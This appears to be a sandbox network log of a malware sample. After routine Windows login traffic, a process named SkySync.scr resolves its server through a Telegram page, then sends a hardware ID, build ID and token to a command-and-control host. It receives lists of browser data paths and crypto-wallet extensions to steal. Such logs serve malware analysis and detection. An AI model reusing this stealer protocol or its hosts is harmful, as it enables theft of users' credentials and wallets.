2024-11-01 19:53:27 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 01 Nov 2024 19:53:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-01 19:53:27 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
17	192.168.11.20	49792	20.190.152.20	443

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:53:30 UTC	420	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19042.0.0; IDCRL-cfg 16.000.29143.3; App svchost.exe, 10.0.19041.546, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 4722 Host: login.live.com
2024-11-01 19:53:30 UTC	4722	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-11-01 19:53:30 UTC	569	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Fri, 01 Nov 2024 19:52:30 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C502_BL2 x-ms-request-id: df7ad7c0-eea2-46a4-8940-16b5cc5c2f28 PPServer: PPV: 30 H: BL02EPF0001D6EF V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Fri, 01 Nov 2024 19:53:30 GMT Connection: close Content-Length: 10197
2024-11-01 19:53:30 UTC	10197	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Session ID	Source IP	Source Port	Destination IP	Destination Port
18	192.168.11.20	49793	40.126.24.149	443

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:53:30 UTC	420	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19042.0.0; IDCRL-cfg 16.000.29143.3; App svchost.exe, 10.0.19041.546, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 4722 Host: login.live.com
2024-11-01 19:53:30 UTC	4722	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-11-01 19:53:31 UTC	569	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Fri, 01 Nov 2024 19:52:30 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C502_BAY x-ms-request-id: 71919e83-663a-449d-895b-2955fa8a9aee PPServer: PPV: 30 H: PH1PEPF0001B647 V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Fri, 01 Nov 2024 19:53:30 GMT Connection: close Content-Length: 10197
2024-11-01 19:53:31 UTC	10197	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Session ID	Source IP	Source Port	Destination IP	Destination Port
19	192.168.11.20	49797	20.190.152.20	443

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:53:41 UTC	420	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19042.0.0; IDCRL-cfg 16.000.29143.3; App svchost.exe, 10.0.19041.546, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 4717 Host: login.live.com
2024-11-01 19:53:41 UTC	4717	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-11-01 19:53:42 UTC	569	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Fri, 01 Nov 2024 19:52:41 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C502_BAY x-ms-request-id: e3658823-15b6-4ed5-8c6c-cfd288936b49 PPServer: PPV: 30 H: PH1PEPF0001B695 V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Fri, 01 Nov 2024 19:53:41 GMT Connection: close Content-Length: 10965
2024-11-01 19:53:42 UTC	10965	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.11.20	49799	149.154.167.99	443	2896	C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:57:42 UTC	144	OUT	GET /asg7rd HTTP/1.1 Host: t.me Connection: Keep-Alive Cache-Control: no-cache Cookie: stel_ssid=e534de69cad646680d_15746174916847639097
2024-11-01 19:57:42 UTC	369	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 01 Nov 2024 19:57:42 GMT Content-Type: text/html; charset=utf-8 Content-Length: 12317 Connection: close Pragma: no-cache Cache-control: no-store X-Frame-Options: ALLOW-FROM https://web.telegram.org Content-Security-Policy: frame-ancestors https://web.telegram.org Strict-Transport-Security: max-age=35768000
2024-11-01 19:57:42 UTC	12317	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 61 73 67 37 72 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @asg7rd</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.11.20	49800	188.245.203.37	443	2896	C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:57:43 UTC	231	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: tavukdun.website Connection: Keep-Alive Cache-Control: no-cache
2024-11-01 19:57:43 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 01 Nov 2024 19:57:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-01 19:57:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.11.20	49801	188.245.203.37	443	2896	C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:57:44 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAEBFHJKJEBFCBFHDAEG User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: tavukdun.website Content-Length: 256 Connection: Keep-Alive Cache-Control: no-cache
2024-11-01 19:57:44 UTC	256	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 41 45 42 46 48 4a 4b 4a 45 42 46 43 42 46 48 44 41 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 32 30 37 33 42 33 38 42 45 31 37 31 32 31 35 30 31 38 30 33 31 2d 34 35 33 66 37 31 35 66 2d 30 63 34 66 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 42 46 48 4a 4b 4a 45 42 46 43 42 46 48 44 41 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 66 66 35 36 33 33 66 36 32 31 38 31 31 38 63 32 66 63 33 39 34 64 66 61 35 39 62 32 64 64 39 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 42 46 48 4a 4b 4a 45 42 46 43 42 46 48 44 41 45 47 2d 2d 0d Data Ascii: ------DAEBFHJKJEBFCBFHDAEGContent-Disposition: form-data; name="hwid"42073B38BE171215018031-453f715f-0c4f------DAEBFHJKJEBFCBFHDAEGContent-Disposition: form-data; name="build_id"7ff5633f6218118c2fc394dfa59b2dd9------DAEBFHJKJEBFCBFHDAEG--
2024-11-01 19:57:44 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 01 Nov 2024 19:57:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-01 19:57:44 UTC	69	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 37 63 34 34 65 63 66 30 62 34 37 61 30 61 66 31 38 63 39 62 38 39 35 30 34 30 31 39 37 62 39 34 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|1\|7c44ecf0b47a0af18c9b895040197b94\|1\|1\|1\|0\|0\|50000\|10

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.11.20	49802	188.245.203.37	443	2896	C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:57:45 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FBKKFBAEGDHJJJJKFBKF User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: tavukdun.website Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-11-01 19:57:45 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 42 4b 4b 46 42 41 45 47 44 48 4a 4a 4a 4a 4b 46 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 34 34 65 63 66 30 62 34 37 61 30 61 66 31 38 63 39 62 38 39 35 30 34 30 31 39 37 62 39 34 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 4b 46 42 41 45 47 44 48 4a 4a 4a 4a 4b 46 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 66 66 35 36 33 33 66 36 32 31 38 31 31 38 63 32 66 63 33 39 34 64 66 61 35 39 62 32 64 64 39 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 4b 46 42 41 45 47 44 48 4a 4a 4a 4a 4b 46 42 4b 46 0d 0a 43 6f 6e 74 Data Ascii: ------FBKKFBAEGDHJJJJKFBKFContent-Disposition: form-data; name="token"7c44ecf0b47a0af18c9b895040197b94------FBKKFBAEGDHJJJJKFBKFContent-Disposition: form-data; name="build_id"7ff5633f6218118c2fc394dfa59b2dd9------FBKKFBAEGDHJJJJKFBKFCont
2024-11-01 19:57:45 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 01 Nov 2024 19:57:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-01 19:57:45 UTC	2104	IN	Data Raw: 38 32 63 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4d 36 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 6c 54 45 39 44 51 55 78 42 55 46 42 45 51 56 52 42 4a 56 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 Data Ascii: 82cR29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.11.20	49803	188.245.203.37	443	2896	C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:57:46 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGDBFBGIDHCAAKEBAKFI User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: tavukdun.website Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-11-01 19:57:46 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 47 44 42 46 42 47 49 44 48 43 41 41 4b 45 42 41 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 34 34 65 63 66 30 62 34 37 61 30 61 66 31 38 63 39 62 38 39 35 30 34 30 31 39 37 62 39 34 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 42 46 42 47 49 44 48 43 41 41 4b 45 42 41 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 66 66 35 36 33 33 66 36 32 31 38 31 31 38 63 32 66 63 33 39 34 64 66 61 35 39 62 32 64 64 39 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 42 46 42 47 49 44 48 43 41 41 4b 45 42 41 4b 46 49 0d 0a 43 6f 6e 74 Data Ascii: ------CGDBFBGIDHCAAKEBAKFIContent-Disposition: form-data; name="token"7c44ecf0b47a0af18c9b895040197b94------CGDBFBGIDHCAAKEBAKFIContent-Disposition: form-data; name="build_id"7ff5633f6218118c2fc394dfa59b2dd9------CGDBFBGIDHCAAKEBAKFICont
2024-11-01 19:57:47 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 01 Nov 2024 19:57:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-01 19:57:47 UTC	5685	IN	Data Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.11.20	49804	188.245.203.37	443	2896	C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:57:47 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHDBGHCBAEGCBFHJEBFI User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: tavukdun.website Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache
2024-11-01 19:57:47 UTC	332	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 48 44 42 47 48 43 42 41 45 47 43 42 46 48 4a 45 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 34 34 65 63 66 30 62 34 37 61 30 61 66 31 38 63 39 62 38 39 35 30 34 30 31 39 37 62 39 34 0d 0a 2d 2d 2d 2d 2d 2d 44 48 44 42 47 48 43 42 41 45 47 43 42 46 48 4a 45 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 66 66 35 36 33 33 66 36 32 31 38 31 31 38 63 32 66 63 33 39 34 64 66 61 35 39 62 32 64 64 39 0d 0a 2d 2d 2d 2d 2d 2d 44 48 44 42 47 48 43 42 41 45 47 43 42 46 48 4a 45 42 46 49 0d 0a 43 6f 6e 74 Data Ascii: 